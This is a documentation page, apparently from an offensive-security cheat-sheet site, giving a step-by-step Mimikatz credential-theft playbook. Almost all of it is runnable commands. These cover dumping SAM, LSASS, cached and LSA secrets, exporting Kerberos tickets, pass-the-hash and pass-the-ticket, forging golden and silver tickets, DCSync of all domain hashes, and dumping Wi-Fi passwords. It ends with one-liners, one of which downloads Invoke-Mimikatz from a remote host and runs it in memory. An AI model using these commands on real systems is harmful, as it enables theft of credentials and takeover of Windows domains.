Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Download

GitHub (Official)

# Latest release
https://github.com/gentilkiwi/mimikatz/releases

Kali Linux (Pre-installed)

# Binaries location
ls /usr/share/windows-resources/mimikatz/

# Win32
/usr/share/windows-resources/mimikatz/Win32/mimikatz.exe

# x64
/usr/share/windows-resources/mimikatz/x64/mimikatz.exe

PowerShell Version (Invoke-Mimikatz)

# Empire's version (most maintained)
https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1

Check Target Architecture

Pick correct binary (Win32 or x64) based on target OS. 
wmic os get osarchitecture

[Environment]::Is64BitOperatingSystem

echo %PROCESSOR_ARCHITECTURE%
OutputBinary
64-bit / AMD64 / Truex64/mimikatz.exe
32-bit / x86 / FalseWin32/mimikatz.exe
Using wrong architecture = crash or silent failure. Always check before running.

Setup

mimikatz.exe
privilege::debug
Expected output: Privilege '20' OK — means SeDebugPrivilege enabled.

Credential Dumping

Dump SAM (Local Accounts)

lsadump::sam

Dump LSASS (Logged-on Users)

sekurlsa::logonpasswords

Dump Cached Domain Credentials

lsadump::cache

Dump LSA Secrets

lsadump::secrets

Export Kerberos Tickets

sekurlsa::tickets /export

Pass-the-Hash (PtH)

sekurlsa::pth /user:Administrator /domain:target.local /ntlm:<hash>
Opens new cmd.exe as target user. Combine with psexec or wmiexec for remote access.

Pass-the-Ticket (PtT)

Inject existing ticket

kerberos::ptt <ticket.kirbi>

Verify

klist

Golden Ticket

Requires krbtgt NTLM hash + domain SID. 
kerberos::golden /user:Administrator /domain:target.local /sid:<domain-SID> /krbtgt:<ntlm-hash> /ptt

Get Domain SID

whoami /user
Or via PowerView: 
Get-DomainSID

Silver Ticket

Forges TGS for specific service. Requires service account NTLM hash. 
kerberos::golden /user:Administrator /domain:target.local /sid:<domain-SID> /target:<server> /service:<service> /rc4:<ntlm-hash> /ptt
Common services: cifs, http, mssql, ldap, host.

DCSync

Simulates domain controller replication to pull hashes remotely. 
lsadump::dcsync /domain:target.local /user:Administrator
All users: 
lsadump::dcsync /domain:target.local /all /csv

Token Manipulation

token::elevate
token::elevate /domainadmin

Dump Wi-Fi Passwords

misc::wifi

One-Liners

Dump creds and exit

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > creds.txt

PowerShell in-memory

IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds